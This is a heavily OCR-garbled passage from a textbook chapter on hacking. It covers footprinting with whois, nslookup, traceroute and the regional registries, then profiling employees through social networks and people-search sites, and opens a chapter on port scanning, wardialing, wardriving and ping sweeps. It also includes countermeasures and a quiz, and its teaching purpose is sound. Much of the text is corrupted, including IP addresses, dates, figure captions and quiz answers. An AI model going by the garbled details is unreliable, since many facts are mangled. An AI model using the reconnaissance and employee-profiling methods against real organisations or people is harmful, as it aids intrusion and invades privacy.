of a domain name. IV ho is information contains the name, address, and phone number
of the administrative, billing, and technical contacts of the domain name. It is primarily
used to verify whether a domain name i> available or whether it has been registered.
The following is an example of the whois info for cisco.com

Registrant:

Cisco Technology Inc.
170 W. Tasman Drive
San Jose, CA 95134
US

Domain Name: CISC0.COM
Info Sec

170 W. Tasman Drive
San Jose, CA 95134

408-527-3842 fax: 408-526-4575
Te c h n ic a 1 C ont ac t:
Network Services
170 W. Tasman Drive
San Jose, CA 95134
US

408-527-922 3 fax: 408-526-73 73
Record expires on 15-May-2f)ll.
Record created on 14 -May- 1987*
Domain servers in listed order:

NS1.CISC0.COM 128.107.241.185
NS2.CISCO.COM 64.102.2 55.44

| > NOTE

Whois has also been used
by law enforcement to
gain information useful
In prosecuting criminal
infringement

By looking at this ex n mple it is possible to gain some information about the domain name
and the department that is responsible for managing it which H in this case, is the Infosec
team. Additionally you will note that we have phone numbers and DNS info for the
domain as well, not to mention a physical address that we can look up using Google Earth.

124

PART 2 A Technical Overview of Hacking

Nslookup

Nslookup is a program to query Internet domain name servers. Both UNIX and
Windows eome with an Nslookup client. If Nslookup is given an IP address or a fully
qualified domain name (FQDN), it will look up and show the corresponding IP address.
Nslookup can be used to do the following:

• Find addition ei I IP addresses if authoritative DNS is known from Whois

• List the MX I mail) server for a specific range of IP addresses

Extracting Information with NSLOOKUP:

nslookup

set type = in x

cisco .eo in
Server: x.x.x.x

cisco.com mail exchanger = 10 smtp5.cisco.com.

cisco.com mail exchanger = 10 smtp4.cisco.com.

cisco.com mail exchanger = 10 smtpl .cisco.com.

cisco.com mail exchanger = 10 smtp2.cisco.com.
Authoritative answers can be found from:

cisco.com nameserver = nsl .cisco.com.

cisco.com nameserver = ns2.cisco.com.

cisco.com nameserver = ns5.cisco.com.

cisco.com nameserver s ns4.cisco.com.

nsl .cisco.com internet address = 216.239. 3 2. 10

ns2.cisco.com internet address = 216.239. .34. 10

ns4.cisco.com internet address = 2 16. 2 39. 3 R. 10

Looking at these results you can see several pieces of information that would be useful,
including the addresses of nam eser vers and mail exchangers. The nam eser vers represent
the systems used to host DNS while the mail exchangers represent the addresses of servers
used to process mail for the domain. The addresses should be recorded for later scanning
and vulnerability checking.

Internet Assigned Numbers Authority (IANA)

According to http://www.iana.org, “The Internet Assigned Numbers Authority (IANA’S is
responsible for the global coordination of the DNS root, IP addressing, and other Internet
protocol resources.” Based on this information, IANA is a good starting point to learn more

CHAPTER 5 Footp riming Tools and Techniques

125

DNS 101

Nslookup works with and queries the DNS, which is a hierarchical naming system for servers,
computers, and other resources connected to the Internet. This system associates information such as
IP address to the name of the resource itself. Once this association is present, it is possible to translate
names of systems meaning! ul to humans into the IP addresses associated with networking equipment
for the purpose of locating these devices. DNS can he thought of much in the same way as looking
up phone numbers or names in a phonebook. First, a phonebook system is hierarchical with different
phonebooks for different regions and within those phonebooks, different area codes. Second,
in the phonebook you have names and the phone numbers associated with them, along with other
information such as physical addresses, much like DNS. When looking up an individual you simply
look up their name and see what their phone number is and call them. In DNS this would be called
a forward lookup. You also can call Information and give a number and they can do a reverse lookup
w r iere they take the phone number and look up the name associated with it.

Eibout domain ownership Eiiid to determine registration information. A good place to start is at
the Root Zone Database page, which lists Bill top-level domains, including .com, .edu H .org. Bind
so on. It also shows two-character country codes. Refer to the example shown in Figure 5-7.

For example, for a quick look at information on an .edu domain such as Villa nova
University, you could start at http://wwwAana.org/ domains/root/ dbfedu.htm i The top-level
domain for .edu sites is h t tp:/ 1 www. educa use. edu/ edudo main (and the whois server: whoin
.t’d uni 1 1. sr. t’d it). Th e results of this search can be seen in figure 5-13,

e

EDUCAUSEJ

^/Transforming Education Through Inform tb on Technologies

fltsrueri a ttew Daman

Manage Yixj Dcr

0ifi f M&slt

V*as L’juH-ij

.rd. ft-U-‘,

.edu FAQ

Whais Lookup

FIGURE 5-T3

EDU whois search result.

Who is Lookup

VLl_ajlO’/i L’jjlVi f s 1<L v
300 Ljinc ait «-r Jlv«ti
nilu^lt, fX 1MB

inilfID suits

71 11 an air a Otni.tr art icy
900 LuBEAiru Avbsuu

rrrjlTID StAl is

h.* iti » o it t r IJv l i 1 mnava.. «du

126 PART 2 A Technical Overview of Hacking

The same type of search can be performed ei gainst a .com domain such as http:f fwww
Jiackthestack.com .The results of ill Ls seiirch are shown here:

Domain Name: IIACKTIIESTACK.COM

Reseller: DomainsRus

Created on: 2 7 Jun 2006 11 : 15 : 3 7 EST

Expires on: 27Jnn 2(118 11:15:47 EST

Record last updated on: U May 20QSI G 7: IK: 10 EST

Status: ACTIVE

Owner, Administrative C out tic t, Technical Contact. Billing Con I act:

Superior Solutions Inc

PO Box 1722

Freeport, TX 77542

United States

Phone: +979,8765309
Email:

Domain servers in listed order:

NS1-PLANETD0MAIN.COM

NS2.PLANETD0MAIN.COM

Notice that these results also include a physical address along with all the other domain
information. It would be possible to take the physical address provided and enter it into
any of the commonly available mapping tools and gain information on the proximity
of this address to the actual company. Now that the domain administrator is known,
the next logical step in the process could be to determine a valid network range.

Determining a Network Range

One of the missions of the IAN A is to delegate Internet resources to RIRs. The RIRs
further delegate resources as needed to customers, who include Internet service providers
{ISPs) and end-user organizations. The RIRs are organizations responsible for control of
IPv4 and IPv6 addresses within specific regions of the world. The five RIRs are as follows:

American Registry for Internet Numbers (ARIN) —

North America and parts of the Caribbean

• RIPE Network Coordination Centre (RIPE NCQ—

Europe, the Middle East f and Central Asia

• Asia-Pacific Network Information Centre (APNIQ —

Asia and the Pacific region

CHAPTER 5 Footprinting Tools and Technique

127

Latin American and Caribbean Internet Addresses Registry (LACNIC) —

Latin America and parts of the Caribbean region

• African Network Information Centre (AfriNlQ — Africa

Per standards* each R[R must maintain point-of-contact (POC) information and IP
address, assignment. As an example, if the IP address 202. 131,9 5. 30 corresponding to
http://wwwJiackthestack.com is entered, the following response is returned from ARIN:

OrgName; Asia Pacific Network Information Centre

OrgID: APNIC

City: Milton

StateProv: QLD

PostalCode: 4064

Country: AO

Refe rra I S er ver : wh ois : / / wh ois . ap n ic , net
NetRange: 202,0.0,0-203,2 55.255.25 5
CIDR: 202,0.0.0/7
NetName: APNIC -CIDR-RLK
NetHandle: NET-2 02 -0-0-0-1

Take note of the range of 202.0.0,0 to 203.255.25 5,25 5. This is the range of IP
addresses assigned to the network hosting the http: f fwww.hackthestack.com Web site.

Many other Web sites can he used to mine this same type of data. Some of them
include the following:

• http:f /www. all-net tools, com
• ht tp : / / w w w. Sm a rt wh ois. com

• Ji j£ tp : / / w w w. alhvh ois. con 2

• h t tp : / / w w w. Dnss t itff. com
■ ht tp: / / w w w. Sam spade, org

• The next section shows how a hacker can help determine the true location of the domain

Trace route

Trace route is a software program used to determine the path a data packet traverses to
get to a specific IP address. Traceroute, which is one of the easiest ways to identify the
path to a targeted Web site, is available on both UNIX and Windows ope tei ting systems.
In Windows operating systems, the command is known as tracer t. Regardless of the
name the program display s h tracer t displays the list of routers on a path to a network
destination by using Time to Live (TTL) time-outs and Internet control message protocol
(TCMP) error messages. This command will not work from a DOS prompt.

128

PART 2 A Technical Overview of Hacking

C:\tracert http://www.cisco.com

Tracing route to arin.net [202. 131 .95 .30]

1 I ms J ms 1 ms 192. 123.254

2 12 ms 15 ms 11 ms adsl-G9-151-Z23-2S4.dsl.hstritx.swbeU.net
[G9. 151 .223.254]

3 12 ms 12 ms 12 ms 151 . 164. 244. 193

4 11 ms 11 ms 11 ms bbl-g14-€.hstntx. sbcglobal . net [ 151 . 164. 92.2(94]

5 48 ms 51 ms 48 ms 151 . 164 . 98.61

6 46 ms 48 ms 48 ms gi1–l.wiia4.net.reach.com [206.223 . 123 . 1 1]

7 49 ms 5© ms 48 ms i -{D-0-O.wil-coreO2.bi . reach.com [202.84.251.233]

S 196 ms 195 ms 196 ms i- 15-0. sydp-core02 . bx, reach . com [202.84.140.37]

9 204 ms 202 ms 203 ms unknown.net.reach.com [134.159.131.110]

10 197 ms 197 ms 200 ms ssg550-l-rl-l.network.netregistry.net
[202. 124.240.66]

11 200 ms 227 ms 197 ms forward. plane tdoma i.n . com [202.131.95.30]

Analyzing these results, it is possible to get better look at what trace route is providing.
Traceroute functions by sending out a packet to a destination with the TTL set to 1 .
When the packet encounters the first router in the path to the destination it decrements
the TTL by 1 . in this case setting the value to 0, which results in the packet being
discarded and a message being sent back to the original sender. This response is recorded
and a new packet is sent out with aTTLof 2. This packet will make it Ihrough the first
router* then will stop at the next router in the path. This second router then sends an error
message back to the originating host much like the original router. Traceroute continues
to do this over and over until a packet finally reaches the target host, or until a host
is determined to be unreachable. In the process, traceroute records the time it took for
each packet to travel round trip to each router. It is through this process that a map can
be drawn of the path to the final destination.

In the above results you can literally see the IP address, name, and the Lime it took
to reach each host and return a response giving a clear picture of the path to connect
to the remote host and the time to do so.

The next -to- 1 a st hop before the Web site will often be the organization’s edge device,
such as a router or firewall. However, you cannot always rely on this Information
because security-minded organizations tend to limit the ability to perform traceroutes
into their networks.

Tracking an Organization’s Employees

You can use the Web to find a wealth of information about a particular organization
that can be used to plan a later attack. The techniques so far have gathered information
on the financial health of a company, its infrastructure, and other similar information

CHAPTER 5 Footprinting Tools and Technique

that can be used In build a picture ol” the target. Of all the information gathered so far,
there is one area that has yet to be explored: the human element. Gathering information
on human beings is something that until recently has not been easy, but now with
the ever-increasing amount of information people themselves put online, the task has
become easier. The growing usage of social networking such as Facebook, My Space,
and Twitter have all served to provide information that can he searched and tracked
back to an individual, According to Harris Interactive for CareerBuilder.com, 45 percent
of employers questioned are using social networks to screen job candidates I and so are
attackers). Information that can be uncovered online can include the following:

• Posted photographs or information

■ Posted c o nte n t abo ut drill kin g or drug u sa ge

• Posting derogatory information about previous employers, coworkers, or clients
• Discriminatory comments or fabricated qualifications

• The motivation behind providing examples of such information is to give an idea of what
the Eiverage user of social networking puts on the Internet. An attacker wanting to gain
a sense of a company can search social networks and find individuals who work for the
target and engage in idle gossip about their work, A single employee of a company talking
too liberally about goings on at work can provide another layer of valuable insight that
can be used to pian an attack.

Although disgruntled employees deiinitely are a security threat, there are other less
ominous actions that a human can take trmt will affect security. A single employee can be
a source of information leakage that could result in damaging information leaks or other
security threats. Consider the fact that it is not uncommon to find an employee posting
information on blogs. Facebook, Twitter, or other locations that can be publicly accessed.
Other employees have been known to get upset and set up what is known as a “sucks”
domain, In which varying degrees of derogatory information are posted. Some of the
include the following:

One of the reasons why social networking is such an effective tool is that the typical user
of these services does not think of the information that is being shared. Individuals using
social networks have been known to post all sorts of activities, such as dating and clubbing,
to information about bathroom and eating habits. Perhaps the best example of how loosely
people share information in social networks is Twitter. A cursory look at Twitter quickly reveals
a treasure trove of information about most users on the service. Keep in mind that the average
user of Twitter does not typically use the features in the application to keep their postings
private, either because they don’t krow about these settings or because they simply want
to feel important by broadcasting their thoughts to anyone who might listen.

130

PART 2 A Technical Overview of Hacking

• Blogs
• Per son ei I pages on a social networking site: Face book, MySpace, Linkedln.

• People-tracking sites

• Each of these sites can be examined tor nntnes h e-mail addresses, addresses, phone
numbers, photographs, and so on. As an example, consider the Peoples Dirt site
( h ttp:f / ww w.peoplesdirt. com ) t which is shown in Figure 5-14.

This site is designed to allow individuals to make anonymous posts about other
individuals or organizations. Any disgruntled person can post libelous or hate-filled
messages.

Web logs, or blogs, are a good source for information about a targeted company if one
can be located. Anyone can go to one of the many free b logging sites and set up a blog
on which to post un filtered comments and observations. As such, attackers have found
them a valuable source of information. IIow r ever, one of the bigger problems with blogs
for the attacker is finding a blog that contains the information that may be useful. Consider
the fact that a tremendous amount of blogs exist, and of those only a small amount are
ever updated; the rest are simply ei ban denied by the owners. Wading into the sea of blogs
on the Internet is a challenge^ but using a site such as h ttp: i / w w w. bl\< ;jsi \ i nh vitff’n j < J . t -om
will allow for the searches of many blogs quickly. Additional sites such as httpi/fwww
iWinhcvtn and http://www.spock.com allow users to search personal pages such as
Facebook and My Space for specific content.

FIGURE 5-14

Peoples Dirt Web site.

Click Mere to refresh numbers

TOPICS

POST?

LfliiT TOBT

®

Pci HewUssis

Kuw botm*t arvd *tsr snonvnous.

1

1

MS potff

Peopled iit.com in tli? ihws

Chct< ierp to lee pea plea dirt, cum in the new

7

13

Ho PMtS

Click hent to view ycajr *tsle

55794

tic pDSti

PinnaylwMiia

Click ftere 1* view *«ir start

505

3831

tic postl

Virgin!*

Click >iei^ 1* vie* ftmr *to!e

4S4

2(448

NO pIKti

telnet of CclumtiB
CRde here to view D.C.

L29

61b

HQ fftatf

Hew y^rti

Click it’t (d •> c*ir itaie

19

22

No pt-ils

Click tier* Id Vie+t f air ttale

SO

2Q

tic pos1s

CHAPTERS Footprinting Tools and Techniques 131

Z ABASE ARCH

FIGURE 5-15

Zabasearch,

Pubik Information Recite Sn mm nw: < l too l$k 1 4 toolsie Wis it w r LENNY TOOLSIE -Detailed Background R sport CgcnpnlwiKiw Report Cirwrnl Rfleoffls Utusl Cwflrt iKwm#lwi» Find LENNY TOOLSIE 6*1 Curort Ptisn? in$ Address.

L TOOLSIE ■ 4 Free Listings

Chwk w^]» 8 far: TOOLSIE . LEMV . LEWY TOOJSg lews » m86aa& to LENWY TOOLSff
E.mtl Tto Fan
khaw VJhati Yat/ia Saino S^aidhad on cha tni*irmi Cnjalt- > PubliC-fitMEd

TO OLSIE mm m i-jt,a Get Big; &■ I c^*m Lrmi.m**» o H n*
202 ROCK RD Mg ^htoihsfld L FiOf^pj Rtyan MaiiC’inn ui^inni

Ba&ortxnd Check on ,h;:x rao.

LENNOX TOQLSIE a.™ ^ una . • lEte^’i

JO* KELLOGG Dfi Nf^hortatut IFrpasity Re Mil h«.*m r^>j ww

BaArrQund Ched< on LFWOX TOOLSIE

L E NNO% TQ OLSIE <m i-ss-j Itr- ‘ ‘ cn..^,, f.-..i …. ,.
770 SIVEfi’ SPPW8S BLVX Naiiftbchcod & Pr-oirerty P apart mow*
WICHITA. KS r>73IJ f3taitt**-fltlT Ctrfrm Cuinnl Phw t, Addrtv

BrektroLnd Check on LEWCK TQQlSIE

LENNOX TO OLSIE im dm ims Get ttie E>1 r+i tmn a<**« imn
9007 HARRY 3T NtnrfitothppJ I, P^Jt’rtY Pfpul n.wncnini-crifaan
WICHITA. KS 87307 Cgrir^ Crn-H Plum **ddnw
Lto*enxj,U Check on LEWOK TOOLSIE

Sucks domains Eire domain names that have the word “sucks 1 ‘ in the name
(for example, http://www.wiihnnrlsiuks.org and http://www.paifpahucks.com}. These are
sites in which individuals have posted unflattering content about the targeted company
due to a perceived slight or wrong. An interesting note about sucks sites is that although
such sites may seem wrong or downright illegal, the comments posted on them have
been frequently protected under free speech laws. Such sites are
usually taken down, however, partly due to the domain name not
actually being used or the domain simply being “parked” l although
if the site is active and noncommercial, the courts have sometimes
ruled such sites Legal).

Finally, another way of gaining information about an individual
is to access sites that gather or aggregate information for easy
retrieval. One such site is http://www.zabasearch.com, of wmich an
example search is shown in Figure S-l Another similar site to
2 aba search is http://www.spokeo.com, which accumulates data from
many sources such as Facebook, public records, photos, and other
sources that can be searched to build a picture of an individual.

NOTE

E^en job search sites
such as Monster.com and
Careerbuilder.com are prime
targets for information.
If an organization uses online
job sites, pay close attention
to what type of information
the company’s technology.

132 PART 2 A Technical Overview of Hacking

FIGURE 5-16

Windows Remote
Desktop Web connection.

Windows

Remote Desktop Web Connection

Type ?ht flamt <rf &it imrwte computer
you want to ure, fetcct the- *cxr«i sec
for your EoraiccbwL and Tfacti clck

When the eemettjon p*ge opens, you

can jdd J So your FivocJfi s Ft* risy
cornecton lo ibf ifflfit c«iDf*ut#r.

Siac

Zl

□ Scwi logon nfonnatiwi for flus

‘.» »: I. 1 j

Exploiting Insecure Applications

Many applications were not built with security in mind. Insecure applications such as
Telnet, File Transport Protocol (FTP], the V commands, Post Office Protocol {POP),
Hypertext Transfer Protocol (HTTP), and Simple Network Management Protocol (SMMP)
operate without encryption. What adds to the problem is that some organizations even
inadvertently put this information on the Web, As an example, a simple search engine
query for terminal service Web access TSWCB (another name for Remote Desktop) returns
dozens of hits that appear similar to Figure 5-16. This application is designed to allow
users to connect to a work or home computer and access files just as if physically sitting
in front of the computer The problem with locating this information online is that an
attacker can use the information to get further details about the organization or even
break in more quickly in some cases.

NOTE

Organizations that are more
ambitious should consider
attempting to footprint
themselves to see firsthand
what types of information are
currently in the public space
and whether such information
is potentially damaging.

Using Basic Countermeasures

Footprinting can be a very powerful tool in the hands of
an attacker who has the knowledge and patience to ferret
out the information that is available about any entity
online. But although footprinting is a powerful tool, there
are some countermeasures that can lessen the impact
to varying degrees.

The following shows some of the defenses that can
be used to thwart footprinting:

Web site — Any organization should take a long hard look at the information
available on the company Web site and determine whether it might be useful
to an attacker. Any potentially sensitive or restricted information should
be removed as soon as possible, along with any unnecessary information.

CHAPTER 5 Footprinting Tools and Technique

133

Special consideration should be given to information such as e-mail addresses,
limited to only those who require it. Additionally, the applications, programs,
and protocols used by a company should be nondescript to avoid revealing the
nature of services or the environment,

Google hacking — This attack can be thwarted to a high degree by sanitizing
information that is available publicly wherever possible. Sensitive information
should not be posted in any location, either linked or unlinked, that can be accessed
by a search engine as the public locations of a Web server tend to be.

Job listings — When possible, use third- party companies for sensitive jobs so the
company is unknown to all but approved applicants. If third-party job sites are used,
the job Listing should be as generic as possible, and care should be taken not to list
specific versions of applications or programs. Consider carefully crafting job postings
to reveal less about the IT infrastructure.

• Domain information — Always ensure that domain registration data is kept as
generic as possible, and that specifics such as names, phone numbers, and the like
are avoided. If possible, employ any one of the commonly available proxy services
to block the access of sensitive domain data. An example of one such service
is shown in Figure 5-17.

Employee posting — Be especially vigilant about information leaks generated
by well-intentioned employees who may post information in technical forums
or discussion groups that may be too detailed, More important, be on the
lookout for employees who may be disgruntled and who may release sensitive
data or information that can be viewed or accessed publicly. It is not uncommon
for information leakage to occur around events such as layoffs or mergers.

^Domains
by proxy; i

FHRM.TE HltlSltHlDK’

busmen but OUJy

HOME MTACM)U(! «0 WilVIASF PF.-.IVfWIC’^ MM A&UTUS SWWtT LCdltSSLfS

Welcome to Domains By Proxy*!

Outlay Y«ir domain Mine- iai four personal iilcrairjiiui.

Did yau kritr* Ihil it* ttth dOmani niml you nfl-ndiv. Miry wir ■
diivnlitH a. JiMin* ■ tan find (urtyoui nam a, lunie &Jci*&£, fmom
number and Email andraea^

The taw naquijs th«t Dro aersoflal > nrarrnHwi ju $tvna* win* every domain you rag steioe TiadE public In She p ¥rtKHS ,F database. Vmir nliiriflKCBfrte in stwiitv available – and vulnerable – 1o sp amnrwrs, An itniv il ih ft’s j scNninn: I ioiii,bm& ffy Pi e-etttn.g a Private Registration will; L Blorj dCTpaln-fE ialerj sp-arn L Prev*rf1 hii HiH\ fi & ilalfteri l End data mimng Q Prated vriur ran iy’i pr«Mty L fifio. mwie.1 t^aiah n is- EWcieucc! Aii n fliw Qi aai PWiKKvPToanet! fit- ffpig ,■! SSt r>iTfficitlr? i <n .1:111: | .-.J,; – ■ \ir.~i FIGURE 5-17 Domains by proxy. 134 PART 2 A Technical Overview of Hacking [> NOTE A good proactive step is for a company to research the options to block a search engine’s bots from indexing a site. One of the best examples of code that tells search engines how a site can be indexed is the robots.txt file. The robots.txt file can be configured to block the areas a search engine looks, but it can also be accessed by a hacker that can open the file in any commonly available text editor. • Insecure applications — Make it a point to regularly scan search engines to see whether links to private services are available (Terminal Server, Outlook Web App [OWA], virtual private networks [VPNs], and so on). Telnet and FTP have similar security problems because each allows anonymous logon and passwords in clear text. Consider replacing such Eip plications with a more secure application such as SSI I or comparable wherever possible or feasible. Securing DNS — Sanitize DNS registration and contact information to be as generic as possible (for example, “Web Services Manager,” main compel ny phone number 5 5 5 – 12 12, techs i tpport@ hack thestack. com ) < II a ve two DNS servers — one internal and one external in the demilitarized zone (DMZ), The external DNS should contain only resource records of the DMZ hosts, not the internal hosts. For additional safety, do not allow zone transfers to any IP address. CHAPTER 5 Footprinting Tools and Technique 135 CHAPTER SUMMARY This chapter covered the process of fool print Lag, or passively obtaining inform a Lion about a target. In iLs most basic form, footprinting is simply inibrniation gathering that is performed carefully to avoid detection completely, or for lis long as possible, while always trying to maintain n stealthy profile. I llimalery, the goal of footprinting is lo gainer lis much information as- possible about the intended victim without giving away intentions or even the presence of the attacker involved. If done carefully and methodically, footprinting can reveal large a mounts of information about a target. The process, when complete, will yield a better picture of the intended victim. In most situations, a large amount of lime will be spent performing this process with relatively lesser amounts of time being spent in the actual hacking phase. Patience In the information gathering phase is a valuable skill to learn alongside how lo actually gain the Information, IdeaUy, information gathered from a well-planned and executed footprinting process wilJ make the hacking process more effective. Remember, footprinting includes gathering in forma I ion from a diverse group of sources and locations. Common sources of information used in the footprinting phase include company Web sites, financial reports, fin ogle searches, social networks, and other simitar technologies. Attackers can and will review any source of information that can till on I the picture of the victim more than il would be otherwise. KEY CONCEPTS AND TERMS Footprinting Google hacking Insecure applications Internet Archive Internet Assigned Numbers Nslookup Regional Internet Registries Authority (I AN A) {RIRs} Social networking site Traceroute Whois 136 PART 2 A Technical Overview of Hacking CHAPTER 5 ASSESSMENT 1 . What is the best description of foot printing? A. t’ashLVL- information ^citherini; B. Active information gathering C Actively mapping an organization’s vulnerabilities D. Lsing vulnerability scanners to map an organization 1. Which of the following is the best example of passive information gathering? A. Reviewing job listings posted by the targeted company B. Fort scanning the targeted company C. t idling I he compel uy tind asking questions about its services 11 Driving around the targeted company connecting to open wireless connections 1. Which of the following is not typically a Web resource used n> footprint a company? A, Company Web site B. job search sites C Internet Archive D. Phonebooks 1. It’ you were looking lor information about a company’s financial history you would want to check the database. • Which of the following is the best description of the intitle tag?’ • A. Instructs Google to look in the I; Hi. of a specific site B. Instructs Google to ignore words in the title of a specific document C Instructs Google to search for a term within the title of a document \1 instructs Google to search a specific 1 Hi- fi. J f you need to find a domain that is located in Canada, the best KIK lo check tirsl would be . 1. You have been asked to look up a domain that is located in Europe. Which KIK should you examine first? A. LAC NIC Jri. APMlC C. RIPE 11 AKIN &. SNMP uses encryption and Is therefore a secure program. A. “True B. False 1. You need lo determine the path to a specific IP address. Which of the following tools Is the best to use? A. J ANA B. Nslookup C. Who is D. Trace route 1. During the footprinting process social networking sites can be used to find out about employees and look for technology policies and practices. A. True 15. h’alse Port Scanning FOOTPRINTS IS A PROCESS that passively gathers information about a target from many diverse sources. The goal of footprinting is to learn about a target system prior to launching an attack. If footprinting is performed patiently and thoroughly, a very detailed picture of a victim can be ach ieved, but that still ‘eaves this question: What’s next? If all this information is gathered up, organized, and placed before the attacker, how can it be acted upon? This next step, port scanning, is an active process that gathers information in more detail than footprinting can. After the target has been analyzed and all relevant information organized, port scanning can take place. The goal of performing port scanning is to identify open and closed ports as well as the services running on a given system. Port scanning forms a critical step in the hacking process because the hacker needs to identify what services are present and running on a target system prior to initiating an effective attack. Port scanning also helps to determine the course of action in future steps because once the nature of running services is identified, the correct tools can be selected from the hacker’s toolbox. For example, a hacker may have a tool to target a file transfer service such as the Washington University file transfer program (WUFTP). However, if the victim is running Microsoft File Transfer Protocol (FTP) program, the exploit tool will be incompatible. Once a port scan has been thoroughly performed, the hacker can then move on to mapping the network and looking for vulnerabilities that can be exploited. Chapter 6 Topics This chapter covers the following topics and concepts: • How to determining the network range • How to identify active machines • How to map open ports • What Operating System (OS) fingerprinting is • How to map the network • How to analyze the results Chapter fi Goals When you complete this chapter, you will be able to: • Define port scanning » Describe common port scanning techniques • List common Nmap switches • Describe why User Datagram Protocol (UDP) is harder to scan than Transmission Control Protocol (TCP) • Define common Nmap command switches • Describe OS fingerprinting • Detail active fingerprinting • List differences between active and passive fingerprinting • List network mapping tools Determining the Network Range The tirst step in purl ^nuinlnu is one ol preparation, spec ili cully the yLHJieriny ni inlur- matlon about the range of Internet protocols (IPs) in use by the target. When identifying the network range, your ultimate goal is to get a picture of what the range of IP addresses in use look like together with the appropriate subnet mask in use. With this information the port scanning process can become much more accurate and effective as only the IP addresses on the intended victim will be scanned. Not having the cipproprmte network range can result in an inaccurate or ineffective scan that may even inadvertently set off dck’t’liv v measures. \V3ien yet liny in form ill ion aboul the network ranges, two options can be used. With a manual registrar query, you simply go directly to the registration sites CHAPTER 6 Port Scanning 139 and query for information manually. With an automatic registrar query, you use Web-based tools. No matter how the range is determined, it is essential that the range be positively identified before you go any further. Chapter 5 provides a more in depth explanation of the tools that can be used: Manual Registrar Query (from the Internet Assigned Numbers Authority, or IANA), Root Zone Database, Whois, and Automatic Registrar Query Identifying Active Machines Once a valid network range has been obtained, the next step is to identify active machines on the network. There are several ways that this task can be accompli shed, including the following: ■ Wardialing • Wardriving • Pinging • Port scanning Each of these methods offers different capabilities useful in detecting active systems and as such will need to be explored individually. To use each of these techniques the attacker must clearly understand areas for which they are useful as well as those areas in which they are weak. Wardialing An old but still useful technique is wardialing. Wardialing is a technique thEit has existed for more than 25 years as a footprinting tool, which explains why the process involves the use of modems. Wardialing is very simple: it uses a modem Lo dial up phone numbers to locale modems. Upon first look, the technique looks sorely out of place in a world of broadband and wireless connection technology, but modems are still widely used due to the low cost of the technology An attacker who picked a town at random and dialed up a range of phone numbers in that town would likely turn up several computers with modems attached, Wardialing can still be effective even in a world of high-speed connection technologies. Dialing a range of phone numbers and getting several modems to respond doesn’t initially sound significant until what is connected to those modems is considered. While modems are not nearly as popular as they were several years ago, their presence is still felt h as modems can be found connected to devices such as public branch exchanges (PBX), firewalls* routers, fax machines, and a handful of other systems not including NOTE Trie name wardialing originated from the 1983 film WarGames. In tile film, the protagonist programmed his computer to dial phone numbers in a town to locate a computer system with the game he was looking for. In the aftermath of the popularity of the movie, the name WarGames Dialer was given to programs designed to do the same thing. Over time, the name was shortened to wardialing. 140 PART 2 A Technical Overview of Hacking actual computers. When you. include more sensitive devices such as routers Bind firewalls, someone dialing up a modem and attaching to a firewall or router remotely takes on new significance, A modem can and should be looked at as a viable backdoor into a network, one that should factor in when planning defensive measures. While there is a long list of wardialing programs that have heen created over the years, three well-known wardialing tools include: ■ ToneLoc — A wardialing program that looks for dial tones by randomly dialing numbers or dialing within a range. it can also look for a carrier frequency of a modem or fax, ToneLoc rises an input file that contains the area codes and number ranges you want it to dial. • THC-Scart — An older DOS-bcised program that can use a modem to dial ranges of numbers in search for a carrier frequency from a modem or fax. • Phone Sweep — One of the few commercial options available in the wardialing market Why is wardialing still successful? One of the biggest reasons is the relative lack of attention paid to modems by corporations. Modems tend to be thought of as old. low-tech devices unworthy of serious attention by defenders of a network or attackers. As such, it is not uncommon to find modems attached to networks that are still active, but forgotten and un monitored. In some cases, modems have been discovered active and attached to a company network only after a phone bill was submitted to closer scrutiny, generating questions Eibout what certain phone numbers are used for. Ward riving War driving is another valuable technique for uncovering access points into a network. Ward riving is the process of locating wireless access points and gaining information about the conliguration of each. This “snilnng” can be performed with a notebook, a car, and software designed to record the access points detected. Additionally, a global positioning system (GPS) can be included to go to the next step of mapping the physical location of the access points. Don’t get caught up in names, however; ward riving or variations can be performed with the same equipment while walking, biking, or even Hying. If an attacker is able to locate even a single unsecured access point, the dangers can be enormous, as It can give that same attacker quick and easy access to the internal network of a company. An attacker connecting to an unsecured access point is more than likely bypassing protective measures such as the corporate firewall, for example. ^ MOTE Always check local laws before using any security/hacking tools. As an example, some states have laws that make it illegal to p face a call without the intent to communicate. In fact, several laws banning the use of automated dialing systems used by companies such as telemarketers were a direct result of wardialing activities. CHAPTER 6 Port Scanning 141 But Is It Legal? It has been debated by black hats and while hats whether the act of wardrivfng is legal or not. Currently there are no laws specifically making ward riving illegal. However,, using the information obtained to gain unauthorized access to a network is. For example, in the United States a case that is generally cited in the debate is the case of State v. Allen. In this case r Allen used wardialing techniques in an effort to attach to Southwestern Bells network in a bid to get free long-distance calling. However, even though Allen connected to Southwestern Bell’s system, he did not attempt to bypass any security measure that appeared after the connection was made. In the end r the ruling was that although a connection was made, access was not. While there are a multitude of tools u.sed to perform wardriving, other tools, including the following, Eire useful in defending against these Lit tacks: Airsnort — Wireless cracking tool • Airs n are — An intrusion detection system to help you monitor your wireless networks. It can notify you as soon as an unapproved machine connects to your wireless network. ■ Kismet — Wireless network detector, sniffer, and intrusion detection system commonly found on Linux Netstumbler — Wireless network detector: also available for Mac and for handhelds So why is WEirdriving successful? One of the most common reasons is that employees install their own access points on the company network without company permission (known as a rogue access points). An individual who installs an access point in such a way will more than likely have no knowledge of. or possibly not care about, good security practices and hy extension leave the access point completely unsecured. Another reason is that sometimes when an access point has been installed, those performing the installation have actively decided not to configure any security features, WEirdriving generally preys upon situations in which security is not considered or is poorly planned. Steps should be taken to ensure that neither happens. By definition ward riving is only the process of locating access points in the surveyed area. In reality, an individual practicing wardriving simply drives through an area, making note of the types and locations of access points, disregarding services that may be offered. If an attacker moves toward investigating further (attempting to determine the services that are available), the attacker is then piggybacking. ( 142 PART 2 A Tech nical Overview of H ack i ng Ping is a protocol thai is very useful in troubleshooting many network problems and, as Such, has a useful purpose. In some situations shutting off or blocking ping may actually affect the network more than the security measure is worth. Astute network administrators are well aware of the potential danger of leaving ping available, but in many instances they leave it enabled anyway to make network management easier. I NOTE If you want to learn more about ping and how ICMP works, take a moment to review RFC 792. It can be found at http:ttwww.faqs . orgfrfcs/rfc792. h tmL NOTE Pinging A technique that is useful at determining whether a system is present and active is a ping sweep of an IP address range. By default, a computer will respond to a ping request with a ping reply or echo. A ping is actually an Internet Control Message Protocol (ICMP) message. With the use of a ping, it is possible to identify active machines and measure the speed at which packets are moved from one host to another as well as obtain details such as the Time to Live (TTL). A key advantage of ICMP scanning is that it can be performed rapidly because it runs scanning and analysis processes in parallel. In other words, it means more than one system can be scanned simultaneously: thus it is possible to scan an entire network rapidly. There are several tools available that can perform ping scans< but three of the better known ones include Pin gen Friendly Pinger, and WS Ping Pro. Of course, for every pro there is a con, and pinging in this manner 